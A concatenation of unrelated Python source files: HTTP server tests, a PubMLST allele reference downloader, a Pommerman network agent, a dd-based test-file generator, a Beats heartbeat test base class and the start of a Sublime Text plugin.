method, uri, protocol, params = parse_request_line("GET /demo_form.php?name1=value HTTP/1.1")
self.assertEqual(method, "GET")
self.assertEqual(uri, "/demo_form.php")
self.assertEqual(protocol, "HTTP/1.1")
self.assertEqual(params, "name1=value")
def test_parse_request_params_GET(self):
"""Parse params 'name1=value&name2=value2'"""
params = parse_params("name1=value&name2=value2", "GET", "-", {})
self.assertEqual(params, {'name1': 'value', 'name2': 'value2'})
###################################################################
# INTEGRATION TESTS
    # These tests verify whether your server works correctly.
# Each test starts the server, sends an HTTP request and then
# checks whether the HTTP response is valid.
#
# These kinds of tests will be used for grading. As with unit
# tests, you should write a lot of additional tests yourself.
###################################################################
# This method sends a request using urllib (built-in) library
def test_get_root_index_urlopen(self):
"""Return code 200 when a GET request is made to /index.html (urlopen)"""
response = urlopen(self.server + "/index.html")
headers = dict(response.headers.items())
self.assertEqual(response.getcode(), 200)
self.assertEqual(headers["content-type"], "text/html")
html = response.read().decode("utf-8")
self.assertNotEqual(html.lower().find("to-do"), -1)
# This method sends a request using the Requests (3rd-party) library
# This is the recommended approach to writing integration tests
def test_get_root_index_requests(self):
"""Return code 200 when a GET request is made to /index.html (requests)"""
response = requests.get(self.server)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers["content-type"], "text/html")
self.assertNotEqual(response.text.lower().find("to-do"), -1)
    # Occasionally, you'll want to send arbitrary data to your server, for
    # instance, to test how your server responds to invalid HTTP requests
def test_invalid_request_line(self):
"""Return code 400 when the request line is invalid"""
response = self._manual_request("This is really not an HTTP request\n")
self.assertTrue(response.startswith("HTTP/1.1 400"))
def test_invalid_request_method(self):
"""Return code 405 when the method is invalid"""
response = self._manual_request("GET2 / HTTP/1.1\n")
self.assertTrue(response.startswith("HTTP/1.1 405"))
def test_invalid_request_uri(self):
"""Return code 400 when the uri is invalid"""
response = self._manual_request("GET 2/ HTTP/1.1\n")
self.assertTrue(response.startswith("HTTP/1.1 400"))
def test_invalid_request_version(self):
"""Return code 400 when the version is invalid"""
response = self._manual_request("GET / HTTP/1.3\n")
self.assertTrue(response.startswith("HTTP/1.1 400"))
def test_GET_app_index(self):
"""test_GET_app_index @ GET {'first': 'bob'} /app-index"""
self.prepare_db_data()
response = self._manual_request(
"GET /app-index?first=bob HTTP/1.1\n\n"
)
self.assertTrue(response.startswith("HTTP/1.1 200"))
def test_GET_app_json(self):
"""test_GET_app_index @ GET /app-json"""
self.prepare_db_data()
response = self._manual_request(
"GET /app-json HTTP/1.1\n\n"
)
self.assertTrue(response.startswith("HTTP/1.1 200"))
def test_POST_app_add(self):
"""test_contains_text @ POST {'first': 'Ed', 'last': 'Sheeran'} /app-add"""
        r = requests.post(self.server + "/app-add", data={'first': 'Ed', 'last': 'Sheeran'}, timeout=2)
self.assertEqual(r.status_code, 200)
if __name__ == '__main__':
if len(sys.argv) == 2:
test_db = ServerTest()
if sys.argv[1] == "create_db":
test_db.prepare_db_data()
elif sys.argv[1] == "delete_db":
test_db.remove_file(PICKLE_DB)
else:
unittest.main()
|
AlleleReferenceManager.py
|
import os
import re
import pandas as pd
import urllib.request
import sys
# from glob import glob
import shutil
import utilities
import seq_utilities
from _collections import defaultdict
from Bio import SeqIO
# LocusTableMask = 'locus_list*.tab'
LocusTableFile = 'locus_list.tab'
# LocusTableColumns = ['locus','isORF','isPeptide','basename','URL','expected','species']
LocusTableEssential = ['locus','URL']
true_values=['True','TRUE','Yes']
LocusTableBoolColumns = ['isORF','isPeptide','expected']
referenceSubdirectory = 'reference_sequences/' ##This should be a subdirectory somewhere
### This retrieves all the information from PubMLST, and provides the allele sequences files when requested.
## I am putting lookup tables in a separate object, but the MLST table is still here. I can't decide whether to extract it so that it is kept with
## other lookup tables or whether it should stay here because it is actively retrieved from the PubMLST site.
script_version = 0.15 #9 Sept 2015
script_subversion =0
def readAlleleReferences(filename):
alleles = {}
if os.path.isfile(filename):
refDir = os.path.dirname(filename)
alleles = dict()
try:
with open(filename) as fin:
for line in fin:
if line[0] != '#':
(gene,allele_file) = line.rstrip().split('\t') ##Filename is relative to local_allele_file
alleles[gene] = os.path.join(refDir,allele_file)
except IOError:
print("Warning: unable to open local allele master file: {}".format(filename))
return alleles
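# Based on the parsing above, the allele master file is a tab-separated list of
# '<gene><TAB><fasta file>' lines (lines starting with '#' are ignored), with
# file paths interpreted relative to the directory of the master file itself.
# An illustrative (hypothetical) example:
#   abcZ    alleles/abcZ.fasta
#   adk     alleles/adk.fasta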
##Setting dir is where to find information about alleles to use
## Reference Dir is place to store downloaded alleles (perhaps to be deprecated)
## Output dir is a place to keep a permanent copy of the references used in this analysis
reqUpdate='RequireUpdate'
class AlleleReferenceManager:
def __init__(self,settingDir,referenceDir):
##Location of settings
self.setting_directory = settingDir
##Basic information about the loci to evaluate
LocusFrameRaw = pd.read_table(os.path.join(settingDir,LocusTableFile),comment='#',dtype=str)
LocusFrameRaw.set_index(keys='locus',inplace=True,drop=False,verify_integrity=True)
LocusFrameRaw = utilities.castColumnsToBool(LocusFrameRaw,LocusTableBoolColumns,true_values)
self.LocusFrame = LocusFrameRaw.dropna(subset=LocusTableEssential,how='any')
dif = len(LocusFrameRaw) - len(self.LocusFrame)
if dif > 0:
print("Dropping {} loci due to missing information. Check settings file".format(dif))
if len(self.LocusFrame) == 0:
print("Error: no loci identified")
# if reqUpdate in self.LocusFrame:
# print("Evaluating {} sequences".format(len(self.LocusFrame)))
self.allele_data = dict()
self.MLST_profile_file = os.path.join(settingDir,"MLST_profiles.txt")
#store a master copy of allele files here; keep as backup
self.reference_directory = referenceDir
if not os.path.isdir(self.reference_directory):
os.mkdir(self.reference_directory)
##TODO check if this ever should be replaced with a version in the working dir
self.local_allele_file = self.reference_directory + 'allele_reference.txt'
self.local_profile_file = self.reference_directory + 'MLST_reference.txt'
self.MLST_schemes = dict()
#Tell main program to wait if necessary
self.updated = False ##For tracking if there was background updating
def updateReferences(self, waitForCompletion = True, EssentialOnly = False):
##At some point, there will be a thread in here and the option to not wait for completion
### Read the URLs for allele reference files; Retrieve them if they are not local
# with open(self.allele_references_file) as allele_file:
# allele_lines = allele_file.readlines()
# allele_references = dict([line.split() for line in allele_lines if line != ''])
######### Note: handle blank lines better
remote_references = False
for URL in self.LocusFrame['URL']:
if not os.path.isfile(URL):
remote_references = True
break
#### Keep track of genes that have reference files
if remote_references:
print(" Updating reference files...\n")
local_references = self.downloadAlleleReferences(EssentialOnly)
## TODO: should this be in load references?
#if a gene does not have a user-specified basename, try to infer it from the file
# Attempted to make this compatible with both PubMLST.org conventions and MLST.org conventions.
# This search will fail if the allele name has anything but numbers in it (or if the gene name ends with a number).
names_updated = False
nameRE = re.compile(r'>(.*\D)\d+$')
for (gene, filename) in local_references.items():
if gene in self.LocusFrame.index and not pd.isnull(self.LocusFrame.loc[gene,'basename']): ##test that the name works
with open(filename) as fin:
for line in fin:
if re.match(">",line):
if not re.match(">"+self.LocusFrame.loc[gene,'basename'],line):
                                    raise RuntimeError('Specified basename for {} is inconsistent with usage in allele file'.format(gene))
else:
names_updated = True
name = None
with open(filename) as fin:
for line in fin:
nameMatch = nameRE.match(line)
if nameMatch:
new_name = nameMatch.group(1)
if name == None:
name = new_name
elif name != new_name:
                                    raise RuntimeError('Inconsistent naming in file {}; {} and {}.'.format(filename,name,new_name))
self.LocusFrame.loc[gene,'basename'] = name
if names_updated:
out_file = os.path.join(self.setting_directory,"names_updated.tab")
self.LocusFrame.to_csv(out_file,sep='\t')
raise ValueError("You did not provide a key to permit interpretation of the names in the gene files. We made suggestions. Try replacing your locus list files with {}".
format(out_file))
#Get profiles
local_profile_files = dict()
with open(self.MLST_profile_file) as profiles:
for line in profiles:
values = line.split()
URL = values[1]
name = values[0]
local_profiles = self.reference_directory + name + '_profiles.txt'
if not (EssentialOnly and os.path.isfile(local_profiles)):
if EssentialOnly:
print('Cannot proceed without a MLST profile list for {}'.format(name))
                        print('To override automatic download, put a properly formatted profile list from PubMLST here: {}'.format(local_profiles))
print('Downloading MLST profile for {}'.format(name))
handle = urllib.request.urlopen(URL)
temp = local_profiles+'.tmp'
with open(temp,'wb') as fout:
fout.write(handle.read())
##TODO: if local_profiles exists, we should check that temp is a good replacement. However, I don't know what qualifies as "good", since records could theoretically be removed legitimately
if name == 'Nm':
try:
self.reformatNmCC(temp,local_profiles)
except:
print("Warning: failed to reformat new MLST profile table at {}".format(temp))
else:
os.rename(temp,local_profiles)
local_profile_files[name] = local_profiles
#Save a list of the local reference files so that this can be used even if the server is down
with open(self.local_profile_file,'w') as fout:
local_dir = os.path.dirname(self.local_profile_file)
for (gene, filename) in local_profile_files.items():
file_dir,file_name = os.path.split(filename)
rel_dir = os.path.relpath(file_dir,local_dir)
rel_file = os.path.join(rel_dir,file_name)
fout.write(gene + "\t" + rel_file + "\n")
        ##This is a logical placeholder for when the above code is threaded
if waitForCompletion:
self.updated = False ##
#~ t = multiprocessing.Process(target=worker)
#~ t.start()
#~ t.join()
else:
print("Background updating not implemented yet")
#~ t = threading.Thread(target=worker)
#~ t.start()
#~ self.updated = updateThread ## The thread would need to
##Takes a dict of address for the ultimate reference files (allele_references), downloads them, and saves the list in the "local_allele_file"
def downloadAlleleReferences(self,EssentialOnly=False):
downloaded_references = dict()
####Use the existing local references by default
default_refs = readAlleleReferences(self.local_allele_file)
for gene in self.LocusFrame.index:
if gene in default_refs:
if os.path.isfile(default_refs[gene]):
downloaded_references[gene] = default_refs[gene]
##Try to download the files, or copy them from the setting directory to the reference directory
# genes_remaining = set(self.LocusFrame.index.tolist())
# if EssentialOnly:
# genes_remaining = [x for x in genes_remaining if x not in downloaded_references]
# for gene in genes_remaining:
success = True
for (gene, row) in self.LocusFrame.iterrows():
url = row['URL']
# url = self.LocusFrame.loc[gene,'URL']
dest_file = os.path.normpath(os.path.join(self.reference_directory,gene+".fasta"))
try:
if os.path.isfile(url):
shutil.copyfile(url,dest_file)
elif os.path.isfile(os.path.join(self.setting_directory,url)):
shutil.copyfile(os.path.join(self.setting_directory,url),dest_file)
else: ##Download
if (EssentialOnly and gene in default_refs):
if os.path.abspath(dest_file) != os.path.abspath(default_refs[gene]):
shutil.copyfile(default_refs[gene],dest_file)
else:
if EssentialOnly:
print("{} not in local allele file: {}".format(gene,self.local_allele_file))
temp_file = dest_file+'.tmp'
handle = urllib.request.urlopen(url)
with open(temp_file,'wb') as fout:
fout.write(handle.read())
##Validate
new_seqs = SeqIO.to_dict(SeqIO.parse(temp_file,'fasta'))
if len(new_seqs) == 0:
raise ValueError('Failed to parse PubMLST download file for {}'.format(gene))
failed_seq = None
if not os.path.isfile(dest_file): ##Confirm that old sequences are in the new file
print("Downloaded new sequence for {}".format(gene))
else:
old_seqs = SeqIO.to_dict(SeqIO.parse(dest_file,'fasta'))
for seq_name,seq in old_seqs.items():
if seq_name in new_seqs:
if seq.seq != new_seqs[seq_name].seq:
failed_seq = seq_name
print("Old seq ({}bp) does not match new seq ({}bp)".format(len(seq),len(new_seqs[seq_name])))
break
else:
failed_seq = seq_name
break
if failed_seq is None:
print("Validated new sequence for {}".format(gene))
if failed_seq is None:
os.rename(temp_file,dest_file) #only overwrite once download is complete
else:
print("Failed to validate new sequences for {}, due to absence of {}".format(gene,failed_seq))
print("The URL is: \n\t"+url)
with open(temp_file) as pubmlst_download:
line = pubmlst_download.readline()
print("The first line of the downloaded file is: \n\t"+line)
raise ValueError('Failed to validate PubMLST download file for {}'.format(gene))
except ValueError as e:
print('Download Error for {}; relying on backup file {}. Message : {}'.format(url,self.local_allele_file,e))
# genes_remaining.remove(gene)
if not (reqUpdate in row.index) or (row[reqUpdate] in ['True','TRUE','Yes']):
success = False
else:
print("Continuing, but you may want to see if newly downloaded file is usable:"+temp_file)
else:
downloaded_references[gene] = dest_file ##the exception will not get here
# genes_remaining.remove(gene)
#Save a list of the local reference files so that this can be used even if the server is down
with open(self.local_allele_file,'w') as fout:
local_dir = os.path.dirname(self.local_allele_file)
for (gene, filename) in downloaded_references.items():
file_dir,file_name = os.path.split(filename)
rel_dir = os.path.relpath(file_dir,local_dir)
rel_file = os.path.join(rel_dir,file_name)
fout.write(gene + "\t" + rel_file + "\n")
if not success:
sys.exit("Failure to download files. Fatal error. Run in --debug mode if you want to run without fresh download")
return downloaded_references
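##For reference, the file written above is a simple two-column, tab-delimited list mapping each locus to the
##location of its FASTA file relative to the directory containing local_allele_file. A hypothetical example
##(locus names and paths are illustrative only, not taken from a real run):
## abcZ	abcZ.fasta
## adk	adk.fasta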
##Our database reformats the clonal complex names from PubMLST
##This whole thing should be wrapped in a try block
def reformatNmCC(self,file_in, file_out):
profile_table = pd.read_table(file_in,header=0)
cc_list = profile_table['clonal_complex'].unique()
print("Loading profile table for {}. Has {} profiles in {} clonal complexes".format('Nm',len(profile_table),len(cc_list)))
cc_re = re.compile('ST-((/?\d+)+) complex(.+)?')##'complex' may need to be stripped from end
for idx, row in profile_table.iterrows():
CC_ID = row['clonal_complex']
if (CC_ID == '') or pd.isnull(CC_ID):
CC_ID = 'unassigned CC for {}'.format(row['ST'])
else:
try:
cc_match = cc_re.match(CC_ID)
if cc_match:
refST = cc_match.group(1)
extraID = cc_match.group(3)
CC_ID = "CC"+refST
if extraID is not None:
CC_ID += extraID.replace('complex','').rstrip()
else:
print("Warning: unable to interpret the clonal complex for ST {}".format(row['ST']))
except:
print('Exception while reformatting {}'.format(CC_ID))
profile_table.loc[idx,'clonal_complex'] = CC_ID #pylint: disable=no-member
if os.path.exists(file_out):
print("Warning: overwriting file {}".format(file_out))
profile_table.to_csv(file_out,sep='\t',index=False)
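##A sketch of the reformatting performed above, with illustrative PubMLST-style labels (not taken from real data):
## 'ST-11 complex' -> 'CC11'
## 'ST-41/44 complex/Lineage 3' -> 'CC41/44/Lineage 3'
## missing/empty -> 'unassigned CC for <ST>'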
def backgroundUpdateOccured(self):
##This may need to acquire a lock on 'updated' so that it waits for the updating thread to complete
raise Exception("Not implemented")
return self.updated ##This will return True if the analysis was performed prior to downloading the updated reference files
#
# def readAlleleRefNames(self,filename):
# ## load user-defined basenames for allele identification files
# allele_reference_name = dict()
# if os.path.isfile(filename):
# try:
# with open(filename) as fin:
# lines = fin.readlines()
# allele_reference_name = dict([line.rstrip().split('\t') for line in lines if line[0] != '#'])
# except:
# print("Warning: unable to open basename file for reference alleles: {}".format(filename))
# return allele_reference_name
def readAlleleLookupTables(self,filename):
lookup_tables = dict()
if os.path.isfile(filename):
try:
lookup_tables = dict([line.rstrip().split('\t') for line in open(filename) if line[0] != '#'])
except IOError:
print("Warning: unable to open file for allele lookup tables: {}".format(filename))
return lookup_tables
def getAlleleFromQuery(self,locus,allele_name):
query_file = self.getAlleleRefName(locus)
allele_ID = self.extractAlleleID(locus, allele_name)
with open(query_file) as query_handle:
query_seqs = SeqIO.to_dict(SeqIO.parse(query_handle, "fasta"))
try:
best_seq = query_seqs[allele_name]
except KeyError:##This should never happen
print("Failure to find query {} in sequence list {}. Contact developer".format(allele_name,query_file))
raise
my_seq = best_seq
return allele_ID,my_seq
def extractAlleleID(self,locus,allele_name):
basename = self.getAlleleRefName(locus)
allele_ID = None
try:
allele_ID = re.search(basename+'(.+)$',allele_name).group(1)
except Exception:
print('Failure to identify {} in {}'.format(basename,allele_name))
return allele_ID
def loadReferences(self,backupDir = None):
##Make backup copy
if backupDir is not None:
try:
shutil.rmtree(backupDir,ignore_errors=True) ##tolerate a missing backup directory on the first run
shutil.copytree(self.reference_directory,backupDir)
except shutil.Error:
print("Error: unable to make backup copy of references...")
##Alleles
local_alleles = readAlleleReferences(self.local_allele_file)
##validate
gene_set = set(self.LocusFrame.index.tolist())
local_set = set(local_alleles.keys())
if local_set < gene_set:
print("Error: local allele file has only {}/{} alleles.".format(len(local_set),len(gene_set)))
for gene, file in local_alleles.items():
if gene in self.LocusFrame.index: ##Do not add new records to LocusFrame -- this is the master controller
self.LocusFrame.loc[gene,'allele_sequences'] = os.path.normpath(file)
if self.LocusFrame.loc[gene,'isORF']: ##Only testing for internal stops
try:
analysis_dict = seq_utilities.ORF_analysis(file)
analysis_frame = pd.DataFrame(analysis_dict)
for i in analysis_frame.index:
analysis_frame.loc[i,'Allele_ID'] = self.extractAlleleID(gene, analysis_frame.loc[i,'Allele'])
analysis_frame.set_index('Allele_ID',inplace=True)
self.allele_data[gene] = analysis_frame
try:
analysis_frame.to_csv(os.path.join(backupDir,'Allele_info_{}.tab'.format(gene)),sep='\t')
except:
print("Warning: failed to save info about alleles")
except (IOError, KeyError):
self.allele_data[gene] = None
print("Failed to open allele file for gene {}; contact developer.".format(gene))
print(file)
##TODO: may need to check that all loci have a reference sequence
print("Evaluating alleles for {} loci".format(sum(self.LocusFrame['allele_sequences'].notnull())))
Peps = self.LocusFrame['isPeptide'] == True
print("Treating {} sequences as peptides".format(sum(Peps)))
ORFs = self.LocusFrame['isORF'] == True
print("Treating {} genes as ORFs".format(sum(ORFs)))
ORF_alleles = self.LocusFrame[ORFs].index
print("Treating the following genes as ORFs: {}".format(', '.join(ORF_alleles)))
# self.query_basenames = self.readAlleleRefNames(self.allele_reference_names_file)
##MLST profiles
self.MLST_schemes = dict()
if os.path.isfile(self.local_profile_file):
refDir = os.path.dirname(self.local_profile_file)
with open(self.local_profile_file) as profiles:
for line in profiles:
values = line.split()
profile_file = os.path.join(refDir,values[1])
profile_name = values[0]
assert os.path.isfile(profile_file), "MLST scheme {} does not have a file: {}".format(profile_name,profile_file)
self.MLST_schemes[profile_name] = profile_file
else:
print("No local MLST profiles found")
def getGenesWithPeptides(self):
result = defaultdict(list)
pep_frame = self.LocusFrame[self.LocusFrame['DNA_version'].notnull()]
for _,row in pep_frame.iterrows():
result[row['DNA_version']].append(row['locus'])
return result
def getMLSTschemes(self):
return self.MLST_schemes.copy()
def getAlleleRefFile(self,gene):
# result = self.local_alleles[gene] if gene in self.local_alleles else None
# return result
result = self.LocusFrame.loc[gene,'allele_sequences'] if gene in self.LocusFrame.index else None
return result
def getAllRefFiles(self):
return self.LocusFrame['allele_sequences'].dropna().tolist()
def getAlleleRefName(self,gene):
# return self.query_basenames[gene]
result = self.LocusFrame.loc[gene,'basename'] if gene in self.LocusFrame.index else None
return result
def getAlleleDataFrame(self,gene):
result = self.allele_data[gene] if gene in self.allele_data else None
return result
def getLoci(self):
return self.LocusFrame['locus'].tolist()
def isORF(self,gene):
return (gene in self.LocusFrame.index) and (self.LocusFrame.loc[gene,'isORF'] == True)
def expected_gene(self,gene):
return (gene in self.LocusFrame.index) and (self.LocusFrame.loc[gene,'expected'] == True)
def isPep(self,gene):
return (gene in self.LocusFrame.index) and (self.LocusFrame.loc[gene,'isPeptide'] == True)
import argparse
def main():
## Simple argparse
parser = argparse.ArgumentParser()
parser.add_argument('--version','-V',action='version',version='%(prog)s {}.{}'.format(script_version,script_subversion))
parser.add_argument('-s','--setting_dir',help='Location of setting files')
parser.add_argument('-r','--reference_dir',help='Location of reference files')
# parser.add_argument('-o','--output_dir',help='Location to write any output')
parser.add_argument('--update',action='store_true',help="Update files in reference dir")
args = parser.parse_args()
homeDir = os.path.dirname(os.path.realpath(__file__))
settingDir = args.setting_dir if args.setting_dir else os.path.join(homeDir,'settings/')
referenceDir = args.reference_dir if args.reference_dir else os.path.join(homeDir,referenceSubdirectory)
# outputDir = args.output_dir if args.output_dir else os.getcwd()
arm = AlleleReferenceManager(settingDir,referenceDir)
if args.update:
arm.updateReferences(True)
if __name__ == "__main__":
main()
# _arm.updateAllFiles()
|
multiplayer_over_net_agent.py
|
'''An example agent that communicates with a remote player process over the network (adapted from the docker agent).'''
import json
import time
import os
import threading
import requests
import docker
from . import BaseAgent
from .. import utility
from .. import characters
class MultiPlayerAgent(BaseAgent):
"""The Docker Agent that Connects to a Docker container where the character runs."""
def __init__(self,
# docker_image,
port,
server='http://localhost',
character=characters.Bomber):
# docker_client=None,):
# env_vars=None):
super(MultiPlayerAgent, self).__init__(character)
# self._docker_image = docker_image
# self._docker_client = docker_client
# if not self._docker_client:
# self._docker_client = docker.from_env()
# self._docker_client.login(
# os.getenv("PLAYGROUND_DOCKER_LOGIN"),
# os.getenv("PLAYGROUND_DOCKER_PASSWORD"))
# self._acknowledged = False # Becomes True when the container is ready.
self._server = server
self._port = port
self._timeout = 32
self._container = None
self._is_human_controlled = True
# self._env_vars = env_vars or {}
# Pass env variables starting with DOCKER_AGENT to the container.
# for key, value in os.environ.items():
# if not key.startswith("DOCKER_AGENT_"):
# continue
# env_key = key.replace("DOCKER_AGENT_", "")
# self._env_vars[env_key] = value
# Start the docker agent if it is on this computer. Otherwise, it's far
# away and we need to tell that server to start it.
# if 'localhost' in server:
# container_thread = threading.Thread(
# target=self._run_container, daemon=True)
# container_thread.start()
# print("Waiting for docker agent at {}:{}...".format(server, port))
# self._wait_for_docker()
# else:
# request_url = "{}:8000/run_container".format(server)
# request_json = {
# 'docker_image': self._docker_image,
# 'env_vars': self._env_vars,
# 'port': port
# }
# requests.post(request_url, json=request_json)
# waiting_thread = threading.Thread(
# target=self._wait_for_docker, daemon=True)
# waiting_thread.start()
# def _run_container(self):
# print("Starting container...")
# self._container = self._docker_client.containers.run(
# self._docker_image,
# detach=True,
# auto_remove=True,
# ports={10080: self._port},
# environment=self._env_vars)
# for line in self._container.logs(stream=True):
# print(line.decode("utf-8").strip())
# def _wait_for_docker(self):
# """Wait for network service to appear. A timeout of 0 waits forever."""
# timeout = self._timeout
# backoff = .25
# max_backoff = min(timeout, 16)
# if timeout:
# # time module is needed to calc timeout shared between two exceptions
# end = time.time() + timeout
# while True:
# try:
# now = time.time()
# if timeout and end < now:
# print("Timed out - %s:%s" % (self._server, self._port))
# raise
# request_url = '%s:%s/ping' % (self._server, self._port)
# req = requests.get(request_url)
# self._acknowledged = True
# return True
# except requests.exceptions.ConnectionError as e:
# print("ConnectionError: ", e)
# backoff = min(max_backoff, backoff * 2)
# time.sleep(backoff)
# except requests.exceptions.HTTPError as e:
# print("HTTPError: ", e)
# backoff = min(max_backoff, backoff * 2)
# time.sleep(backoff)
# except docker.errors.APIError as e:
# print("This is a Docker error. Please fix: ", e)
# raise
def init_agent(self, id, game_type, env_info=None):
super(MultiPlayerAgent, self).init_agent(id, game_type)
request_url = "http://localhost:{}/init_agent".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"id": json.dumps(id, cls=utility.PommermanJSONEncoder),
"game_type": json.dumps(game_type, cls=utility.PommermanJSONEncoder),
"env_info": json.dumps(env_info, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in init_agent()!')
def notify_obs(self, obs, waiting=False):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
waiting_serialized = json.dumps(waiting, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/notify_obs".format(self._port)
try:
req = requests.post(
request_url,
timeout=None, # temporarily make it infinity
json={
"obs":
obs_serialized,
"waiting":
waiting_serialized
})
except requests.exceptions.Timeout as e:
print('Timeout!')
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/action".format(self._port)
try:
req = requests.post(
request_url,
# timeout=0.15,
timeout=None, # temporarily make it infinity
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
num_actions = len(action_space.shape)
if num_actions > 1:
return [0] * num_actions
else:
return 0
return action
def die(self):
# notify the death to the agent
request_url = "http://localhost:{}/die".format(self._port)
try:
req = requests.get(
request_url,
timeout=0.5
)
except requests.exceptions.Timeout as e:
print('Timeout in die()!')
self._character.die()
def episode_end(self, reward):
request_url = "http://localhost:{}/episode_end".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"reward": json.dumps(reward, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in episode_end()!')
def shutdown(self):
request_url = "http://localhost:{}/shutdown".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={ })
except requests.exceptions.Timeout as e:
print('Timeout in shutdown()!')
# print("Stopping container..")
# if self._container:
# try:
# return self._container.remove(force=True)
# except docker.errors.NotFound as e:
# return True
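# For illustration only: the agent above assumes a player process listening on self._port that exposes
# /init_agent, /notify_obs, /action, /die, /episode_end and /shutdown endpoints. A minimal sketch of the
# /action endpoint using Flask (hypothetical; the real remote server may be implemented differently):
#
#     from flask import Flask, request, jsonify
#     app = Flask(__name__)
#
#     @app.route('/action', methods=['POST'])
#     def action():
#         obs = json.loads(request.get_json()['obs'])  # observation serialized by MultiPlayerAgent.act()
#         return jsonify({'action': 0})                # always answer "stop"; replace with a real policy
#
#     app.run(port=10080)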
|
create_files.py
|
#!/usr/bin/env python
from subprocess import call
import sys
from threading import Thread
from Queue import Queue
queue = Queue()
num = 9 #number of worker threads and jobs
#size = 10240 #creates 10MB image
size = 102400 #creates 100MB image
def createImage(i,q,dest = "/tmp"):
"""creates N 10mb identical image files"""
value = "%sMB " % str(size/1024)
while True:
i = q.get()
print "Creating %s image #%s in %s inside of thread %s" % (value,i,dest,i)
cmd = "dd if=/dev/zero of=%s/10mbfile.%s bs=1024 count=%s" % (dest,i,size)
status = call(cmd, shell=True)
if status != 0:
print "Trouble creating image files; dd exited with status %s" % status
sys.exit(1)
q.task_done()
def controller():
#spawn N worker pool threads
for i in range(num):
worker = Thread(target=createImage, args=(i,queue))
worker.setDaemon(True)
worker.start()
#populate queue with N jobs
for n in range(num):
queue.put(n)
print "Main Thread Waiting"
queue.join()
print "Done"
if __name__ == "__main__":
controller()
|
heartbeat.py
|
import os
import sys
import http.server
import threading
sys.path.append(os.path.join(os.path.dirname(
__file__), '../../../libbeat/tests/system'))
from beat.beat import TestCase
from time import sleep
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
self.beat_name = "heartbeat"
self.beat_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../../"))
super(BaseTest, self).setUpClass()
def start_server(self, content, status_code, **kwargs):
class HTTPHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(status_code)
self.send_header('Content-Type', 'application/json')
self.end_headers()
if "write_delay" in kwargs:
sleep(float(kwargs["write_delay"]))
self.wfile.write(bytes(content, "utf-8"))
server = http.server.HTTPServer(('localhost', 0), HTTPHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
return server
@staticmethod
def http_cfg(id, url):
return """
- type: http
id: "{id}"
schedule: "@every 1s"
timeout: 3s
urls: ["{url}"]
"""[1:-1].format(id=id, url=url)
@staticmethod
def tcp_cfg(*hosts):
host_str = ", ".join('"' + host + '"' for host in hosts)
return """
- type: tcp
schedule: "@every 1s"
timeout: 3s
hosts: [{host_str}]
"""[1:-1].format(host_str=host_str)
def last_output_line(self):
return self.read_output()[-1]
def write_dyn_config(self, filename, cfg):
with open(self.monitors_dir() + filename, 'w') as f:
f.write(cfg)
def monitors_dir(self):
return self.working_dir + "/monitors.d/"
def assert_last_status(self, status):
self.assertEqual(self.last_output_line()["monitor.status"], status)
def setup_dynamic(self, extra_beat_args=[]):
os.mkdir(self.monitors_dir())
self.render_config_template(
reload=True,
reload_path=self.monitors_dir() + "*.yml",
flush_min_events=1,
)
self.proc = self.start_beat(extra_args=extra_beat_args)
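# A minimal sketch of how the helpers above are typically combined in a test (hypothetical test method;
# wait_until() and output_has() are assumed to come from the libbeat TestCase base class):
#
#     def test_http_up(self):
#         self.setup_dynamic()
#         server = self.start_server('{"foo": "bar"}', 200)
#         self.write_dyn_config(
#             "http.yml", self.http_cfg("myid", "http://localhost:{}".format(server.server_port)))
#         self.wait_until(lambda: self.output_has(lines=1))
#         self.assert_last_status("up")
#         server.shutdown()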
|
packagemeta.py
|
"""
Copyright (c) 2012, Daniel Skinner <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import logging
import threading
import os
import sublime
import sublime_plugin
# PackageControl = __import__("Package Control")
def logger(level):
sh = logging.StreamHandler()
sh.setLevel(logging.DEBUG)
sh.setFormatter(logging.Formatter('%(levelname)s:%(name)s:%(message)s'))
log = logging.getLogger("PackageMeta")
log.setLevel(level)
log.addHandler(sh)
return log
log = logger(logging.WARNING)
_requires = {}
_receivers = {}
class Receiver(object):
"""Base class for receiving broadcast data.
Subclassing this will automatically instantiate and register the class for receiving
broadcast data. For example, to receive data from a broadcast given the name "lint_java",
the following is all that is needed:
